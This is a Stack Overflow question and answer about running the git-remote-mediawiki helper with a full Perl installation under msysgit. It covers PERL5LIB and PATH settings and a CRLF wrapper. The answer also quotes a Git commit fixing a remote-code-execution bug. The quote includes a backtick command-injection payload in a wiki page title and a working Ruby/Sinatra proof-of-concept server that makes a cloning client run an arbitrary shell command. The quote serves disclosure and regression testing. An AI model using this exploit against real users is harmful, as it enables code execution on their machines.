# Use full perl libraries in msysgit for git-remote-mediawiki

Tags: perl, git, mediawiki, msysgit

msysgit ships minimal perl libraries.

I want to download some packages from CPAN so I need to use full perl libraries.

How to do that?

More specifically, I want to use `git-remote-mediawiki` plugin. That's why a full installation of perl libraries is needed.

Comment: Install [Strawberry Perl](http://strawberryperl.com)

Answer (score 1, accepted):

Check first (as in [this article](http://perl5maven.com/how-to-change-inc-to-find-perl-modules-in-non-standard-locations)), if modifying `PERL5LIB` environment variable to reference that script is enough (modify the [`git-cmd.bat`](https://github.com/msysgit/msysgit/blob/master/git-cmd.bat)) :

```
set PERL5LIB = c:\path\to\git\contrib
```

---

Otherwise, for an *external* contrib perl script, like [`git-remote-mediawiki`](https://github.com/git/git/blob/master/contrib/mw-to-git/git-remote-mediawiki.perl), you can try and execute it from a DOS session, with any recent Perl distribution installed.
(like [Strawberry Perl](http://strawberryperl.com/), as mob recommends in the comment).

I would recommend using an [`git-cmd.bat`](https://github.com/msysgit/msysgit/blob/master/git-cmd.bat) (which properly set git `PATH` and `HOME`), with your own perl added first:

```
@set PATH=%git_install_root%\bin;%git_install_root%\mingw\bin;%git_install_root%\cmd;%PATH%
# let's add our perl:
@set PATH=path/to/yourPerl;%PATH%
```

---

This is independent of the msysgit installation, which relies on an old perl for reason explained in [the FAQ](https://github.com/msysgit/msysgit/wiki/Frequently-Asked-Questions).

> The reason is that we need to have an MSys version of Perl because we did not manage to compile the Subversion modules (which are written in C using POSIX features plain Windows does not offer, hence the need for MSys).

---

That seemed enough to get the script started, but the [OP linquize](https://stackoverflow.com/users/1031218/linquize) adds in [the comments](https://stackoverflow.com/questions/15847076/use-full-perl-libraries-in-msysgit/15849576?noredirect=1#comment22581780_15849576):

> I end up writing a **wrapper** program `git-remote-mediawiki.exe` to call the external `perl` and need to convert `CRLF` to `LF` before writing to `stdout` to git, otherwise git hangs if `CRLF` is received.

---

Note: `git-remote-mediawiki` is more robust with Git 2.29 (Q4 2020), and some modernization and fixes to MediaWiki remote backend.

See [commit 9a86064](https://github.com/git/git/commit/9a8606465e81a04d58c20324c402ba3464bc706a), [commit 878d150](https://github.com/git/git/commit/878d150106b0050253390623a8fd5acf553f4be0), [commit 4842a11](https://github.com/git/git/commit/4842a1179444a44095eb9e2dc55abb2c49059642), [commit 2d6b08a](https://github.com/git/git/commit/2d6b08aff41026019e2051abec05e52785450e83), [commit f8ab018](https://github.com/git/git/commit/f8ab018dafc2ecbea29397c2112c9e7156d7f080), [commit 1d42b4d](https://github.com/git/git/commit/1d42b4d01c95cae37e9c0ebe0ed7c9418f2d6c25), [commit 2388541](https://github.com/git/git/commit/2388541a77540b8e2acfcf77904515ebb65ffcc5), [commit 4f80bc9](https://github.com/git/git/commit/4f80bc9bc2706b9ef467fab3c53b6815f37b2854), [commit dde66eb](https://github.com/git/git/commit/dde66eb6f1d29c6b5729b41904eaef69234be07c), [commit 9ff2958](https://github.com/git/git/commit/9ff2958dd8376869e1de9a34fdaf74121481bb3f), [commit 730ecc1](https://github.com/git/git/commit/730ecc10c7069b1968e4c90b9450013546a510b3), [commit 090850e](https://github.com/git/git/commit/090850e1b03fb16fcfcd929098c6834db389faa5), [commit 128efae](https://github.com/git/git/commit/128efae6dc2f8613a593f55ea326afb5d003ff17), [commit 5e87dce](https://github.com/git/git/commit/5e87dceae013d8752c0fda0c5a3e90d631109de9), [commit e35973b](https://github.com/git/git/commit/e35973b2c93ce085ea491320d74a5a09bff18a47) (21 Sep 2020), and [commit 872977b](https://github.com/git/git/commit/872977b10d503d54e8496df398361167b1824bf0), [commit 442f5aa](https://github.com/git/git/commit/442f5aacccc64ad1a4a05a7d2f97042a2ad206d3) (16 Sep 2020) by [Ævar Arnfjörð Bjarmason (`avar`)](https://github.com/avar).
See [commit 96653ce](https://github.com/git/git/commit/96653ce3041e87f71a8dbbcfd4cb80424758c8fd) (21 Sep 2020) by [Simon Legner (`simon04`)](https://github.com/simon04).
<sup>(Merged by [Junio C Hamano -- `gitster` --](https://github.com/gitster) in [commit 5a25615](https://github.com/git/git/commit/5a25615d5c026580b3e5645b53f8397bd8c3e76d), 04 Oct 2020)</sup>

For example:

> ### [`remote-mediawiki`](https://github.com/git/git/commit/4842a1179444a44095eb9e2dc55abb2c49059642): convert to quoted `run_git()` invocation
>
> <sup>Reported-by: Joern Schneeweisz</sup>
> <sup>Signed-off-by: Ævar Arnfjörð Bjarmason</sup>

> Change those callsites that are able to call `run_safe()` with a quoted list of arguments to do so.
>
> This fixes a [RCE (Remote Code Execution)](https://en.wikipedia.org/wiki/Arbitrary_code_execution) bug in this transport helper reported by Joern Schneeweisz to the git-security mailing list.
> The issue is being made public due to the relative obscurity of the remote-mediawiki code.
>
> The security issue is that we'd execute a command like this via Perl's "`open -|`", where the `$name` is taken directly from the `api.php` response. So that a JSON response of e.g.:
>
> ```
> [...]"title":"`id>/tmp/mw`:Main Page"[..]
> ```
>
> Would result in an invocation of:
>
> ```
> git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"
> ```
>
> > From code such as this, which is being changed by this patch:
>
> ```
> run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));
> ```
>
> So we'd execute an arbitrary command, and also put "`remote.origin.namespaceCache=:notANameSpace`" in the config.
> With this change we quote all of this, so now we'll simply write "``` remote.origin.namespaceCache=``id>/tmp/x``:notANameSpace ```" into the config, and not execute any remote commands.
>
> About the implementation: as noted [in "Opening a filehandle into a command"](https://perldoc.perl.org/functions/open.html#Opening-a-filehandle-into-a-command) (see also "[Safe Pipe Opens](https://perldoc.perl.org/perlipc#Safe-Pipe-Opens)"), this style of invoking `open()` has compatibility issues on Windows up to Perl 5.22.
> However, Johannes Schindelin notes that we shouldn't worry about Windows in this context because (quoting a private E-Mail of his):
>
> 1. The mediawiki helper has never been shipped as part of an official Git for Windows version. Neither has it ever been part of an official MSYS2 package. Which means that Windows users who want to use the mediawiki helper have to build Git themselves, which not many users seem to do.
> 2. The last Git for Windows version to ship with Perl v5.22.x was Git for Windows v2.11.1; Since Git for Windows v2.12.0 (released on February 25th, 2017), only newer Perl versions were included.
>
> So let's just use this `open()` API.
> Grepping around shows that various other Perl code we ship such as gitweb etc. uses this way of calling `open()`, so we shouldn't have any issues with compatibility.
>
> For further reference and future testing, here's working exploit code provided by Joern:
>
> ```
> #!/usr/bin/ruby
> # git client side RCE via `mediawiki` remote proof of concept
> # Joern Schneeweisz - GitLab Security Research Team  
>
> require 'sinatra'
> set bind: '0.0.0.0'  
>
> if not ARGV[0]  
>
> puts "Please provide the shell command to be execucted."
> exit -1  
>
> end  
>
> cmd = ARGV[0]
> all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
> revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
> mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)  
>
> post '/api.php' do  
>
> if params[:list] == 'allpages'
>   return all_pages
> end  
>
> if params[:prop] == 'revisions'
>   return revs
> end  
>
> return mainpage
> end
> ```
>
> Which:
>
> `[...]` should be run like: `ruby wiki.rb 'id>/tmp/mw'`.
> Now when being cloned with `git clone mediawiki::http://localhost:4567` the file `/tmp/mw` will be created during the clone process, containing the output of `id`.

Comment: There is a problem with perl INC. Can't locate MediaWiki/API.pm in @INC (@INC contains: /usr/lib/perl5/5.8.8/msys

Comment: @linquize looks like you aren't running the right perl, then (http://stackoverflow.com/a/10837013/6309)

Comment: @linquize or don't install an additional perl, and check if simply modifying the `PERL5LIB` to reference the `git-remote-mediawiki` perl script, it is enough (http://perl5maven.com/how-to-change-inc-to-find-perl-modules-in-non-standard-locations)

Comment: I cannot find PERL5LIB in the perl script. How do I modify that? Also, I am running a portable perl, and there are lib, site/lib, vendor/lib

Comment: Yes, I did, but why the path is `c:\path\to\git\contrib`?

Comment: @linquizev it is an example you would need to adapt to your git installation. Basically, it can be any directory where you have copied the `git-remote-mediawiki.perl` script.

Comment: I end up writing a wrapper program git-remote-mediawiki.exe to call the external perl and need to convert CRLF to LF before writing to stdout to git, otherwise git hangs if CRLF is received.

Comment: @linquize ok, I have added that step in the answer for more visibility.

Comment: However, I get stuck when having UTF-8 characters in the wiki. Some UTF-8 in Windows are messed up, but no problem in linux.

Comment: @linquize maybe it would be best to mark this question as solved and open a new one then.